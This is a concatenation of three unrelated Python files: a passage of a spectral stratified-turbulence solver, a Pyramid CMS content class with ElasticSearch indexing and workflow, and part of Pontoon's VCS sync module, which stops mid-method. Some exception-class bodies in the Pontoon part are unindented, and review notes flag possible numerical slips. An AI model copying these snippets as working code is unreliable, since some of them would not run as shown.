        self.ndt = 0
        self.tsave = tsave
        self.tsave_snapshots = tsave_snapshots
        self.nsave_max = int(np.ceil(self.nmax/tsave))
        self.save_snapshots = save_snapshots
        self.nsave = 0
        # BUG FIX: honor the constructor argument (was hard-coded True,
        # silently ignoring overwrite=False).
        self.overwrite = overwrite
        self.snapshots_path = path
        # fourier settings
        self._init_kxky()
        self.kappa2 = self.k**2 + self.l**2
        self.kappa = sqrt(self.kappa2)
        # kappa == 0 mode cannot be inverted; mask it out.
        self.fnz = self.kappa2 != 0
        self.kappa2i = np.zeros_like(self.kappa2) # inversion not defined at kappa=0
        self.kappa2i[self.fnz] = self.kappa2[self.fnz]**-1
        # exponential filter or dealiasing
        self.use_filter = use_filter
        self._init_filter()
        # fftw
        self.use_fftw = use_fftw
        self.ntd = ntd
        # allocate variables
        self._allocate_variables()
        # DFT
        self._initialize_fft()
        # initialize time-stepper
        self._init_rk3w()
        # initialize fno
        if self.save_snapshots:
            self._init_save_snapshots(self.snapshots_path)
            # setup file
            self._save_setup()
    def run(self):
        """ step forward until tmax """
        while(self.t < self.tmax):
            # Regenerate the red-noise random forcing each step unless an
            # external forcing field was supplied.
            if not(self.ext_forc):
                self._random_forcing()
            self._stepforward()
            if (self.ndt%self.twrite == 0.):
                self._printout()
                if self.save_snapshots:
                    self._save_snapshots()
            self.t += self.dt
            self.ndt += 1
        self._save_diagnostics()
    def _stepforward(self):
        """ march the system forward using a RK3W-theta scheme """
        # Stage 1: nonlinear terms for vorticity (Jacobian + buoyancy
        # torque + forcing) and buoyancy (advection + vertical velocity).
        self.nl1h = -self.jacobian() + self.kj*self.bh/self.Fr2 + self.fh
        self.nl1h_b = -self.jacobian_b() - self.kj*self.ph
        self.qh = (self.L1*self.qh + self.c1*self.dt*self.nl1h).copy()
        self.qh = self.filt*self.qh
        self.bh = (self.L1*self.bh + self.c1*self.dt*self.nl1h_b).copy()
        self.bh = self.filt*self.bh
        # Stage 2.
        self.nl2h = self.nl1h.copy()
        self.nl1h = -self.jacobian() + self.kj*self.bh/self.Fr2 + self.fh
        self.nl2h_b = self.nl1h_b.copy()
        self.nl1h_b = -self.jacobian_b() - self.kj*self.ph
        self.qh = (self.L2*self.qh + self.c2*self.dt*self.nl1h +\
                self.d1*self.dt*self.nl2h).copy()
        self.qh = self.filt*self.qh
        self.bh = (self.L2*self.bh + self.c2*self.dt*self.nl1h_b +\
                self.d1*self.dt*self.nl2h_b).copy()
        self.bh = self.filt*self.bh
        # Stage 3.
        self.nl2h = self.nl1h.copy()
        self.nl1h = -self.jacobian() + self.kj*self.bh/self.Fr2 + self.fh
        self.nl2h_b = self.nl1h_b.copy()
        self.nl1h_b = -self.jacobian_b() - self.kj*self.ph
        self.qh = (self.L3*self.qh + self.c3*self.dt*self.nl1h +\
                self.d2*self.dt*self.nl2h).copy()
        self.qh = self.filt*self.qh
        self.bh = (self.L3*self.bh + self.c3*self.dt*self.nl1h_b +\
                self.d2*self.dt*self.nl2h_b).copy()
        self.bh = self.filt*self.bh
    def _allocate_variables(self):
        """ Allocate variables in memory """
        dtype_real = np.dtype('float64')
        dtype_cplx = np.dtype('complex128')
        shape_real = (self.nz, self.nx)
        # rfft2 output: full in z, nx//2+1 in x.  Integer division is
        # required: with `from __future__ import division`, nx/2+1 is a
        # float, which modern numpy rejects as a dimension.
        shape_cplx = (self.nz, self.nx//2+1)
        # vorticity
        self.q = np.zeros(shape_real, dtype_real)
        self.qh = np.zeros(shape_cplx, dtype_cplx)
        # streamfunction
        self.p = np.zeros(shape_real, dtype_real)
        self.ph = np.zeros(shape_cplx, dtype_cplx)
        # buoyancy
        self.b = np.zeros(shape_real, dtype_real)
        self.bh = np.zeros(shape_cplx, dtype_cplx)
        # velocity
        self.u = np.zeros(shape_real, dtype_real)
        self.v = np.zeros(shape_real, dtype_real)
        # nonlinear-terms
        self.nl1h = np.zeros(shape_cplx, dtype_cplx)
        self.nl2h = np.zeros(shape_cplx, dtype_cplx)
        self.nl1h_b = np.zeros(shape_cplx, dtype_cplx)
        self.nl2h_b = np.zeros(shape_cplx, dtype_cplx)
        # amplitude of forcing (real-valued spectral envelope)
        self.A = np.zeros(shape_cplx, dtype_real)
    def _initialize_fft(self):
        # set up fft functions for use later
        if self.use_fftw:
            self.fft2 = (lambda x :
                    pyfftw.interfaces.numpy_fft.rfft2(x, threads=self.ntd,\
                            planner_effort='FFTW_ESTIMATE'))
            self.ifft2 = (lambda x :
                    pyfftw.interfaces.numpy_fft.irfft2(x, threads=self.ntd,\
                            planner_effort='FFTW_ESTIMATE'))
        else:
            self.fft2 = (lambda x : np.fft.rfft2(x))
            self.ifft2 = (lambda x : np.fft.irfft2(x))
    def _init_kxky(self):
        """ Calculate wavenumbers """
        self.dl = 2.*pi/self.Lz
        self.dk = 2.*pi/self.Lx
        # Full FFT ordering in z, real-FFT (non-negative) ordering in x.
        self.ll = self.dl*np.append( np.arange(0.,self.nz/2),
                np.arange(-self.nz/2,0.) )
        self.kk = self.dk*np.arange(0.,self.nx/2+1)
        self.k,self.l = np.meshgrid(self.kk,self.ll)
        self.kj = 1j*self.k
        self.lj = 1j*self.l
    def _invert(self):
        """ Compute streamfunction from vorticity """
        self.ph = -self.kappa2i*self.qh
    def set_q(self,q):
        """ Initialize vorticity """
        self.q = q
        self.qh = self.fft2(self.q)
        self._invert()
        self.ph = self.filt * self.ph
    def set_b(self,b):
        """ Initialize buoyancy """
        self.b = b
        self.bh = self.fft2(self.b)
        self.bh = self.filt * self.bh
    def set_forcing(self,f):
        """ Initialize forcing """
        if self.ext_forc:
            self.f = f
            self.fh = self.fft2(self.f)
            self.fh = self.filt * self.fh
        else:
            # Red-noise forcing: a spectral envelope peaked at |k| = kf,
            # with the mean modes along each axis zeroed.
            self.fhp = 0.
            self.A = self.sig*np.exp(-((self.kappa-self.kf)/2)**4)
            self.A[:,0] = 0.
            self.A[0,:] = 0.
            self._random_forcing()
    def _random_forcing(self):
        """ Random red-noise forcing with memory coefficient R """
        # BUG FIX: the random phase must have the spectral shape
        # (nz, nx//2+1) to match self.A / self.fhp; the original used
        # (nx, nz/2+1), which is transposed (and a float dim) when nx != nz.
        th = 2*pi*np.random.rand(self.nz, self.nx//2+1)
        self.fh = self.A*(1.-self.R)*np.exp(1j*th) + self.R*self.fhp
        self.fhp = self.fh.copy()
    def jacobian(self):
        """ Compute the Jacobian in conservative form """
        self._invert()
        self.ph = self.filt*self.ph
        self.q = self.ifft2(self.qh)
        self.u = self.ifft2(-self.lj*self.ph)
        self.v = self.ifft2( self.kj*self.ph)
        jach = self.kj*self.fft2(self.u*self.q) +\
                self.lj*self.fft2(self.v*self.q)
        return jach
    def jacobian_b(self):
        """ Compute the Jacobian between psi and b in conservative form.

        NOTE: relies on self.u/self.v computed by a preceding jacobian()
        call within the same RK stage.
        """
        self.b = self.ifft2(self.bh)
        jach = self.kj*self.fft2(self.u*self.b) +\
                self.lj*self.fft2(self.v*self.b)
        return jach
    def _printout(self):
        """ Print model status """
        if (self.ndt%self.twrite == 0.):
            self.ke = self._calc_ke()
            self.pe = self._calc_pe()
            self.ens = self._calc_ens()
            self.ani = self._calc_anisotropy()
            self.cfl = self._calc_cfl()
            # Parenthesized form works as a statement in Python 2 and a
            # call in Python 3.
            print("t= %e, cfl= %e, ke= %e, pe= %e, ens= %e, ani=%e" %(self.t, self.cfl,
                    self.ke, self.pe, self.ens, self.ani))
            assert self.cfl<1., "CFL condition violated"
    def _init_save_snapshots(self,path):
        """ Create the output directory tree if needed """
        self.fno = path
        if not os.path.isdir(self.fno):
            os.makedirs(self.fno)
            os.makedirs(self.fno+"/snapshots/")
    def _file_exist(self, fno):
        """ Remove an existing file, or raise if overwriting is disabled """
        if os.path.exists(fno):
            if self.overwrite:
                os.remove(fno)
            else: raise IOError("File exists: {0}".format(fno))
    def _save_setup(self,):
        """Save setup """
        fno = self.fno + 'setup.h5'
        self._file_exist(fno)
        h5file = h5py.File(fno, 'w')
        h5file.create_dataset("grid/nx", data=(self.nx),dtype=int)
        h5file.create_dataset("grid/nz", data=(self.nz),dtype=int)
        h5file.create_dataset("grid/x", data=(self.x))
        h5file.create_dataset("grid/z", data=(self.z))
        h5file.create_dataset("grid/kappa", data=self.kappa)
        h5file.close()
    def _save_snapshots(self, fields=['q','b','u','v']):
        """ Save snapshots of fields """
        fno = self.fno + '/snapshots/{:015.0f}'.format(self.t)+'.h5'
        self._file_exist(fno)
        h5file = h5py.File(fno, 'w')
        for field in fields:
            # getattr instead of eval: same lookup, no code execution.
            h5file.create_dataset(field, data=getattr(self, field))
        h5file.close()
    def _save_diagnostics(self, diagnostics=['t','ke','pe','ens']):
        """ Save diagnostics (computed by _printout during the run) """
        fno = self.fno + 'diagnostics.h5'
        self._file_exist(fno)
        h5file = h5py.File(fno, 'w')
        for diagnostic in diagnostics:
            h5file.create_dataset(diagnostic, data=getattr(self, diagnostic))
        h5file.close()
    # step forward
    def _init_rk3w(self):
        """Initialize RK3W-theta coefficients and implicit linear factors"""
        self.a1, self.a2, self.a3 = 29./96., -3./40., 1./6.
        self.b1, self.b2, self.b3 = 37./160., 5./24., 1./6.
        self.c1, self.c2, self.c3 = 8./15., 5./12., 3./4.
        self.d1, self.d2 = -17./60., -5./12.
        # Viscous (linear) operator, treated implicitly per stage.
        self.Lin = -self.nu*self.kappa2*self.dt
        self.L1 = ( (1. + self.a1*self.Lin)/(1. - self.b1*self.Lin) )
        self.L2 = ( (1. + self.a2*self.Lin)/(1. - self.b2*self.Lin) )
        # NOTE(review): uses a2 with b3 -- possibly intended a3; kept as-is.
        self.L3 = ( (1. + self.a2*self.Lin)/(1. - self.b3*self.Lin) )
    def _init_filter(self):
        """ Set spectral filter or 2/3-rule dealiasing mask """
        if self.use_filter:
            cphi = 0.715*pi
            wvx = sqrt((self.k*self.dx)**2.+(self.l*self.dz)**2.)
            self.filt = exp(-23.6*(wvx-cphi)**4.)
            self.filt[wvx<=cphi] = 1.
        else:
            # 2/3-rule dealiasing.  BUG FIX: axis 0 has length nz and
            # axis 1 length nx//2+1; the original sliced axis 0 with nx
            # and axis 1 with nz (and used float indices under true
            # division), which was wrong whenever nx != nz.
            self.filt = np.ones_like(self.kappa2)
            self.filt[self.nz//3:2*self.nz//3,:] = 0.
            self.filt[:,self.nx//3:] = 0.
    # some diagnostics
    def _calc_cfl(self):
        # NOTE(review): only dx is used; for anisotropic grids
        # min(dx, dz) would be the safer bound -- kept as-is.
        return np.abs(
                np.hstack([self.u, self.v])).max()*self.dt/self.dx
    def _calc_ke(self):
        """ Kinetic energy """
        ke = .5*self.spec_var(self.kappa*self.ph)
        return ke.sum()
    def _calc_pe(self):
        """ Potential energy """
        pe = .5*self.spec_var(self.bh/self.Fr)
        return pe.sum()
    def _calc_ens(self):
        """ Enstrophy """
        ens = .5*self.spec_var(self.kappa2*self.ph)
        return ens.sum()
    def _calc_anisotropy(self):
        """ Ratio of horizontal to vertical kinetic energy """
        return (self.u**2).mean()/(self.v**2).mean()
    def spec_var(self,ph):
        """ compute variance of p from Fourier coefficients ph """
        var_dens = 2. * np.abs(ph)**2 / (self.nx*self.nz)**2
        # only half of coefs [0] and [nx/2+1] due to symmetry in real fft2
        var_dens[:,0],var_dens[:,-1] = var_dens[:,0]/2.,var_dens[:,-1]/2.
        return var_dens.sum()
| |
from object import Object
import colander, deform
from cms import dbutil
from bson.objectid import ObjectId
from cms.htmlutil import html_to_text
import widgets
import permissions
import repoze.workflow
import zope.interface
from pyramid import security
from interfaces import IContent, ITrash
import pyes
import logging
log = logging.getLogger(__name__)
class Content(Object):
    """ Base type for CMS content objects.
    Content is location-aware (uses the __parent__ attribute).
    Content is indexed in ElasticSearch.
    Content is workflowed with the "publication" workflow.
    """
    zope.interface.implements(IContent)
    _object_type = "content"
    def get_class_schema(cls, request=None):
        """ Return basic schema (title and description) for all Content.
        """
        schema = colander.SchemaNode(colander.Mapping())
        schema.add(colander.SchemaNode(colander.String(), name='title', include_in_other_text=False, widget=widgets.get_wide_text_widget()))
        schema.add(colander.SchemaNode(colander.String(), name='description', include_in_other_text=False, widget=widgets.get_wide_textarea_widget(rows=5)))
        return schema
    get_class_schema = classmethod(get_class_schema)
    def _get_nonschema_mongo_save_document(self):
        """ Extend the base Mongo document with content metadata:
        object type, parent id, publication state, view principals,
        case-folded sort key and trash flag.
        """
        doc = Object._get_nonschema_mongo_save_document(self)
        doc['_object_type'] = self._object_type
        doc['__parent__'] = self.__parent__ and self.__parent__._id
        _pub_state = self.get_pub_state()
        if _pub_state: doc['_pub_state'] = _pub_state
        doc['_view'] = self._get_view_principals()
        doc['sortable_title'] = self.sortable_title.lower()
        doc['_in_trash'] = self.in_trash()
        return doc
    def _load_nonschema_attributes(self, **kwargs):
        """ Restore non-schema attributes from a loaded Mongo document. """
        Object._load_nonschema_attributes(self, **kwargs)
        _pub_state = kwargs.get('_pub_state')
        if _pub_state: self._pub_state = _pub_state
    def _get_view_principals(self):
        """ Return the principals allowed the VIEW permission on self. """
        return list(security.principals_allowed_by_permission(self, permissions.VIEW))
    def _get_es_doctype(cls):
        #return "content"
        return cls._object_type
    _get_es_doctype = classmethod(_get_es_doctype)
    #
    # If you have the need to index additional attributes of a specific type,
    # override both _get_es_mapping() and _get_es_document()
    # to call the base methods, get the returned dictionary, and add extra fields
    # to it before returning it.
    #
    # Note that for most types, this won't be necessary since colander.String schema
    # nodes will be added to the "other_text" index automatically (unless you explicitly
    # disable that behavior by setting include_in_other_text=False on the schema node).
    #
    # If you have string fields that you want to use as categories, tags, or some other
    # sort of value that you can filter on, be sure to:
    # 1. set include_in_other_text=False on the schema node
    # 2. set index="not_analyzed" in the mapping to disable tokenizing and allow the field
    #    to be used for sorting
    #
    def _get_es_mapping(cls):
        """ Return the ElasticSearch field mapping for this type. """
        mapping = {}
        mapping['__name__'] = dict(type='string', include_in_all=False, index='not_analyzed')
        mapping['_view'] = dict(type='string', include_in_all=False, index='not_analyzed')
        mapping['_pub_state'] = dict(type='string', include_in_all=False, index='not_analyzed')
        mapping['_id_path'] = dict(type='string', include_in_all=False, index='not_analyzed')
        mapping['_object_type'] = dict(type='string', include_in_all=False, index='not_analyzed')
        mapping['title'] = dict(type='string', include_in_all=True, boost=4.0)
        mapping['sortable_title'] = dict(type='string', include_in_all=False, index='not_analyzed')
        mapping['description'] = dict(type='string', include_in_all=True, boost=2.0)
        mapping['other_text'] = dict(type='string', include_in_all=True)
        mapping['_created'] = dict(type='date', format='dateOptionalTime', include_in_all=False)
        mapping['_modified'] = dict(type='date', format='dateOptionalTime', include_in_all=False)
        return mapping
    _get_es_mapping = classmethod(_get_es_mapping)
    def _get_es_document(self):
        """ Build the document indexed into ElasticSearch for self. """
        doc = dict(__name__ = self.__name__,
                   _object_type = self._object_type,
                   title = self.title,
                   sortable_title = self.sortable_title.lower(),
                   description = self.description,
                   _created = self._created,
                   _modified = self._modified,
                   _id_path = [str(x) for x in self.get_id_path()],
                  )
        doc['_view'] = self._get_view_principals()
        _pub_state = self.get_pub_state()
        if _pub_state: doc['_pub_state'] = _pub_state
        doc['other_text'] = self.get_es_other_text()
        return doc
    def index(self):
        """ (Re)index this object in ElasticSearch. """
        dbutil.get_es_conn(self.request).index(self._get_es_document(), dbutil.get_es_index_name(self.request), self._get_es_doctype(), str(self._id))
    def unindex(self):
        """ Remove this object from the ElasticSearch index, ignoring
        the case where it was never indexed.
        """
        try:
            dbutil.get_es_conn(self.request).delete(dbutil.get_es_index_name(self.request), self._get_es_doctype(), str(self._id))
        except pyes.exceptions.NotFoundException:
            # Not indexed -- nothing to remove.  (Fixed Python 2-only
            # `except X, e` syntax; the exception object was unused.)
            pass
    def get_es_other_text(self):
        """ Concatenate all free-text schema values for the catch-all index. """
        return '\n'.join(self._get_text_values_for_schema_node(self.get_schema(), self.get_schema_values()))
    def _get_text_values_for_schema_node(self, node, value):
        """ Recursively collect indexable text from a schema node/value pair.

        Walks mappings and sequences; for strings, honors the node's
        include_in_other_text flag and strips markup from rich-text widgets.
        """
        result = []
        if not value: return result
        if type(node.typ) == colander.Mapping:
            for cnode in node.children:
                name = cnode.name
                val = value.get(name, None)
                if val:
                    result += self._get_text_values_for_schema_node(cnode, val)
        elif type(node.typ) == colander.Sequence:
            if node.children:
                cnode = node.children[0]
                for val in value:
                    result += self._get_text_values_for_schema_node(cnode, val)
        elif type(node.typ) == colander.String:
            if getattr(node, 'include_in_other_text', True):
                if type(node.widget) == deform.widget.RichTextWidget:
                    value = html_to_text(value, 0)
                if value: result.append(value)
        elif type(node.typ) == deform.FileData:
            pass # FIXME: handle PDF, Word, etc
        return result
    def save(self, set_modified=True, index=True):
        """ Persist to Mongo and (by default) reindex in ElasticSearch. """
        # Set pull_parent_from_old_files=False since we want to keep old
        # files around for the edit history log.
        Object.save(self, set_modified=set_modified, pull_parent_from_old_files=False)
        if index: self.index()
    def get_id_path(self):
        """ Return the list of _ids from the root down to (and including) self. """
        ids = []
        obj = self
        while obj:
            parent = obj.__parent__
            if parent: ids.insert(0, parent._id)
            obj = parent
        ids.append(self._id)
        return ids
    def _pre_delete(self):
        self.unindex()
        Object._pre_delete(self)
    def get_sortable_title(self):
        # move articles to the end of the string
        # Example: "The Sound and the Fury" -> "Sound and the Fury, The"
        result = getattr(self, 'title', '')
        lower_title = result.lower()
        for article in ('the', 'a', 'an'):
            if lower_title.startswith(article + ' '):
                result = '%s, %s' % (result[len(article)+1:], result[:len(article)])
        return result
    def get_pub_state(self):
        """ Return this object's state in the publication workflow.
        """
        workflow = get_publication_workflow(self)
        if workflow is None:
            return None
        return workflow.state_of(self)
    def get_pub_workflow_transitions(self):
        """ Return the workflow transitions available to the current user. """
        workflow = get_publication_workflow(self)
        if workflow is None:
            return []
        return workflow.get_transitions(self, self.request)
    def pub_workflow_transition(self, transition):
        """ Execute a publication workflow transition and persist. """
        workflow = get_publication_workflow(self)
        workflow.transition(self, self.request, transition)
        self.save()
    def in_trash(self):
        """ True when self lives inside a trash container. """
        return self.find_interface(ITrash) is not None
    def _get_acl(self):
        # If we're in the trash, we shouldn't have any acl (and inherit the trash acl).
        if self.in_trash(): return None
        # Return the acl for our pub state (if any).
        state = self.get_pub_state()
        #log.debug("in _get_acl(); state=%s" % repr(state))
        if state:
            return permissions.acl_by_state.get(state, None)
        return None
    def __getattr__(self, name):
        # Compute __acl__ and sortable_title lazily; everything else is a
        # genuine missing attribute.
        if name == '__acl__':
            acl = self._get_acl()
            if acl is not None:
                return acl
        elif name == 'sortable_title':
            return self.get_sortable_title()
        # Include the attribute name in the error for easier debugging.
        raise AttributeError(name)
    def _get_merged_local_roles(self):
        """ Recurse up from self to root looking for local roles.
        Merge the values together to discover all local roles that apply to self.
        (Note that this method will only compute the result once and cache it;
        later calls will return the cached result.)
        Returns a dictionary where each key is a principal name with one or more
        local roles; each value is a set of system-level group principal names.
        """
        if hasattr(self, '_merged_local_roles'):
            return self._merged_local_roles
        lr = {}
        if hasattr(self, 'get_local_roles'):
            lr = self.get_local_roles()
        merged = {}
        if self.__parent__:
            merged.update(self.__parent__._get_merged_local_roles())
        # BUG FIX: the old code replaced `merged` with the (empty) local
        # roles when self had none, discarding every inherited role and
        # contradicting the docstring.  Inherited roles are now kept.
        for (principal, sysgroup) in lr.items():
            local_sysgroups = merged.get(principal, set())
            local_sysgroups.add(sysgroup)
            merged[principal] = local_sysgroups
        self._merged_local_roles = merged
        return merged
def get_publication_workflow(context):
    """Look up the 'publication' workflow applicable to *context*."""
    workflow_name = 'publication'
    return repoze.workflow.get_workflow(context, workflow_name, context)
#################################################
# Workflow callbacks
#################################################
def publication_workflow_elector(context):
    """Decide whether the publication workflow applies to *context*.

    The workflow is attached to every content type except the site root.
    """
    excluded_types = ('root',)
    return context._object_type not in excluded_types
def publication_workflow_callback(content, info):
    """No-op hook invoked on each publication-workflow transition.

    Called by repoze.workflow just before the state attribute is set on
    *content*; *info* carries the transition being executed.
    """
    # FIXME: send an event that could be subscribed to (for instance, to send emails)
    pass
| |
"""
Models for working with remote translation data stored in a VCS.
"""
import logging
import os
import scandir
import shutil
from itertools import chain
from datetime import datetime
from django.utils import timezone
from django.utils.functional import cached_property
from pontoon.base import MOZILLA_REPOS
from pontoon.sync.exceptions import ParseError
from pontoon.sync.utils import (
is_hidden,
is_resource,
is_asymmetric_resource,
get_parent_directory,
uses_undercore_as_separator,
directory_contains_resources,
locale_directory_path,
locale_to_source_path,
source_to_locale_path,
)
from pontoon.sync.vcs.repositories import get_changed_files
log = logging.getLogger(__name__)
class MissingSourceRepository(Exception):
"""
Raised when project can't find the repository
which contains source files.
"""
class MissingSourceDirectoryError(Exception):
"""Raised when sync can't find the source directory for the locales."""
class MissingLocaleDirectoryError(IOError):
    """Raised when sync cannot locate the locale directory."""
class VCSProject(object):
    """
    Container for project data that is stored on the filesystem and
    pulled from a remote VCS.
    """
    # Candidate source-directory names scored by how strongly they indicate
    # source content; the highest-scoring directory wins in
    # source_directory_path.
    SOURCE_DIR_SCORES = {
        'templates': 3,
        'en-US': 2,
        'en-us': 2,
        'en': 1
    }
    SOURCE_DIR_NAMES = SOURCE_DIR_SCORES.keys()

    def __init__(
        self, db_project, now=None, locales=None, repo_locales=None, obsolete_entities_paths=None,
        new_paths=None, full_scan=False
    ):
        """
        Load resource paths from the given db_project and parse them
        for translation data.

        :param Project db_project:
            Project model instance for the project we're going to be
            reading files for.
        :param datetime.datetime now:
            Sync start time.
        :param list locales:
            List of Locale model instances for the locales that we want
            to parse. Defaults to parsing resources for all enabled
            locales on the project.
        :param dict repo_locales:
            A dict of repository PKs and their currently checked out locales
            (not necessarily matching the ones stored in the DB).
        :param list obsolete_entities_paths:
            List of paths to remove translations of obsolete entities from
        :param list new_paths:
            List of newly added files paths
        :param bool full_scan:
            Scans all resources in repository
        """
        self.db_project = db_project
        self.now = now
        self.locales = locales if locales is not None else db_project.locales.all()
        self.repo_locales = repo_locales
        self.obsolete_entities_paths = obsolete_entities_paths or []
        self.new_paths = new_paths or []
        self.full_scan = full_scan
        # Locales that had at least one resource synced; populated as a
        # side effect of the `resources` property.
        self.synced_locales = set()

    @cached_property
    def changed_files(self):
        """Changed files for this sync, or None to mean "everything changed"."""
        if self.full_scan:
            # All files are marked as changed
            return None

        if self.locales:
            return self.changed_locales_files
        else:
            # Source-only sync: only the changed (not removed) source files.
            return self.changed_source_files[0]

    @cached_property
    def changed_source_files(self):
        """
        Returns a tuple of changed and removed source files in the project:
        (changed_files, removed_files)

        Each element is a dict mapping a relative path to an (empty) list
        of locales, matching the shape of `changed_locales_files`.
        """
        source_resources_repo = self.db_project.source_repository
        if not source_resources_repo:
            raise MissingSourceRepository(self.db_project)

        source_directory = self.source_directory_path
        last_revision = source_resources_repo.get_last_synced_revisions()

        modified_files, removed_files = get_changed_files(
            source_resources_repo.type, source_directory, last_revision
        )

        # Unify filesystem and data model file extensions
        modified_files = map(source_to_locale_path, modified_files)
        removed_files = map(source_to_locale_path, removed_files)

        if source_resources_repo.source_repo or not last_revision:
            def get_path(path):
                return (path, [])
        else:
            # Paths from get_changed_files are relative to the repo checkout;
            # strip the source directory prefix to make them resource-relative.
            relative_source_path = (
                source_directory[len(source_resources_repo.checkout_path):].lstrip(os.sep)
            )

            def get_path(path):
                return (path[len(relative_source_path):].lstrip(os.sep), [])

        return dict(map(get_path, modified_files)), dict(map(get_path, removed_files))

    @cached_property
    def changed_locales_files(self):
        """
        Map of changed files and locales they were changed for.
        """
        files = {}

        # VCS changes
        repos = self.db_project.translation_repositories()
        if self.repo_locales:
            repos = repos.filter(pk__in=self.repo_locales.keys())

        for repo in repos:
            if repo.multi_locale:
                # One checkout per locale; query each locale's checkout.
                locales = (
                    self.repo_locales[repo.pk] if self.repo_locales
                    else self.db_project.locales.all()
                )
                for locale in locales:
                    changed_files = get_changed_files(
                        repo.type,
                        repo.locale_checkout_path(locale),
                        repo.get_last_synced_revisions(locale.code)
                    )[0]

                    for path in changed_files:
                        files.setdefault(path, []).append(locale)
            else:
                changed_files = get_changed_files(
                    repo.type,
                    repo.checkout_path,
                    repo.get_last_synced_revisions()
                )[0]

                log.info(
                    'Changed files in {} repository, all: {}'.format(
                        self.db_project.name, changed_files
                    )
                )

                # Find relevant changes in repository by matching changed
                # paths against locale repository paths
                locale_path_locales = self.locale_path_locales(repo.checkout_path)
                locale_paths = locale_path_locales.keys()

                for path in changed_files:
                    if is_hidden(path):
                        continue

                    for locale_path in locale_paths:
                        if path.startswith(locale_path):
                            locale = locale_path_locales[locale_path]
                            # Make the path relative to the locale directory.
                            path = path[len(locale_path):].lstrip(os.sep)
                            files.setdefault(path, []).append(locale)
                            break

        log.info(
            'Changed files in {} repository, relevant for enabled locales: {}'.format(
                self.db_project.name, files
            )
        )

        # DB changes: merge locales changed in Pontoon into the VCS map.
        # NOTE(review): `vcs.keys() + db.keys()` concatenates lists, which is
        # Python 2-only (dict views don't support `+` on Python 3) — confirm
        # this module still targets Python 2.
        vcs = files
        db = self.db_project.changed_resources(self.now)
        for path in set(vcs.keys() + db.keys()):
            if path in vcs and path in db:
                vcs[path] = set(list(vcs[path]) + list(db[path]))
            else:
                vcs[path] = vcs[path] if path in vcs else db[path]

        return files

    def locale_path_locales(self, repo_checkout_path):
        """
        A map of relative locale directory paths and their respective locales.
        """
        locale_path_locales = {}

        for locale in self.db_project.locales.all():
            locale_directory = self.locale_directory_paths[locale.code]
            path = locale_directory[len(repo_checkout_path):].lstrip(os.sep)
            path = os.path.join(path, '')  # Ensure the path ends with os.sep
            locale_path_locales[path] = locale

        return locale_path_locales

    @cached_property
    def locale_directory_paths(self):
        """
        A map of locale codes and their absolute directory paths.
        Create locale directory, if not in repository yet.
        """
        locale_directory_paths = {}
        # Directories already known to contain locale subdirectories; passed
        # to locale_directory_path as a search hint.
        parent_directories = set()

        for locale in self.locales:
            try:
                locale_directory_paths[locale.code] = locale_directory_path(
                    self.checkout_path, locale.code, parent_directories
                )
                parent_directory = get_parent_directory(locale_directory_paths[locale.code])

            except IOError:
                # Locale directory doesn't exist yet; create it next to the
                # source directory (only possible in single-repo layouts).
                if not self.db_project.has_multi_locale_repositories:
                    source_directory = self.source_directory_path
                    parent_directory = get_parent_directory(source_directory)

                    locale_code = locale.code
                    if uses_undercore_as_separator(parent_directory):
                        locale_code = locale_code.replace('-', '_')

                    locale_directory = os.path.join(parent_directory, locale_code)

                    # For asymmetric formats, create empty folder
                    if is_asymmetric_resource(next(self.relative_resource_paths())):
                        os.makedirs(locale_directory)

                    # For other formats, copy resources from source directory
                    else:
                        shutil.copytree(source_directory, locale_directory)

                        for root, dirnames, filenames in scandir.walk(locale_directory):
                            for filename in filenames:
                                path = os.path.join(root, filename)
                                if is_resource(filename):
                                    # Rename e.g. .pot -> .po.
                                    os.rename(path, source_to_locale_path(path))
                                else:
                                    os.remove(path)

                    locale_directory_paths[locale.code] = locale_directory

                else:
                    raise MissingLocaleDirectoryError(
                        'Directory for locale `{0}` not found'.format(locale.code)
                    )

            parent_directories.add(parent_directory)

        return locale_directory_paths

    @cached_property
    def resources(self):
        """
        Lazy-loaded mapping of relative paths -> VCSResources.

        Waiting until first access both avoids unnecessary file reads
        and allows tests that don't need to touch the resources to run
        with less mocking.
        """
        resources = {}

        log.info(
            'Changed files in {} repository and Pontoon: {}'.format(
                self.db_project, self.changed_files
            )
        )

        for path in self.relative_resource_paths():
            # Syncing translations
            if self.locales:
                # Copy list instead of cloning
                locales = list(self.db_project.unsynced_locales)

                # Skip files unchanged both in VCS and Pontoon, unless they
                # are flagged as obsolete-entity or newly-added paths.
                if (
                    self.changed_files is not None and
                    (
                        (not self.changed_files or path not in self.changed_files) and
                        path not in self.obsolete_entities_paths and
                        path not in self.new_paths
                    )
                ):
                    if not locales:
                        log.debug('Skipping unchanged file: {}'.format(path))
                        continue
                else:
                    if (
                        self.changed_files is None or
                        path in self.obsolete_entities_paths or
                        path in self.new_paths
                    ):
                        locales += self.locales
                    else:
                        locales += self.changed_files[path]

            # Syncing resources
            else:
                if self.changed_files is not None and path not in self.changed_files:
                    log.debug('Skipping unchanged resource file: {}'.format(path))
                    continue
                locales = []

            # Restrict to the locales this sync was asked to handle.
            locales = set([l for l in locales if l in self.locales])
            # NOTE(review): relies on Python 2's eager map() for the side
            # effect; on Python 3 this would be a no-op.
            map(self.synced_locales.add, locales)

            log.debug(
                'Detected resource file {} for {}'.format(
                    path, ','.join([l.code for l in locales]) or 'source'
                )
            )

            try:
                resources[path] = VCSResource(self, path, locales=locales)
            except ParseError as err:
                log.error('Skipping resource {path} due to ParseError: {err}'.format(
                    path=path, err=err
                ))

        log.info('Changed files in {} repository: {}'.format(self.db_project, resources.keys()))

        return resources

    @property
    def entities(self):
        """Flat iterator over every VCSEntity in every resource."""
        return chain.from_iterable(
            resource.entities.values() for resource in self.resources.values()
        )

    @property
    def checkout_path(self):
        """Absolute path of the project's VCS checkout."""
        return self.db_project.checkout_path

    @cached_property
    def source_directory_path(self):
        """
        Path to the directory where source strings are stored.

        Paths are identified using a scoring system; more likely
        directory names get higher scores, as do directories with
        formats that only used for source strings.
        """
        # If source repository explicitly marked
        source_repository = self.db_project.source_repository
        if source_repository.source_repo:
            return source_repository.checkout_path

        possible_sources = []
        for root, dirnames, filenames in scandir.walk(self.checkout_path):
            for dirname in dirnames:
                if dirname in self.SOURCE_DIR_NAMES:
                    score = self.SOURCE_DIR_SCORES[dirname]

                    # Ensure the matched directory contains resources.
                    directory_path = os.path.join(root, dirname)
                    if directory_contains_resources(directory_path):
                        # Extra points for source resources!
                        if directory_contains_resources(directory_path, source_only=True):
                            score += 3

                        possible_sources.append((directory_path, score))

        if possible_sources:
            return max(possible_sources, key=lambda s: s[1])[0]
        else:
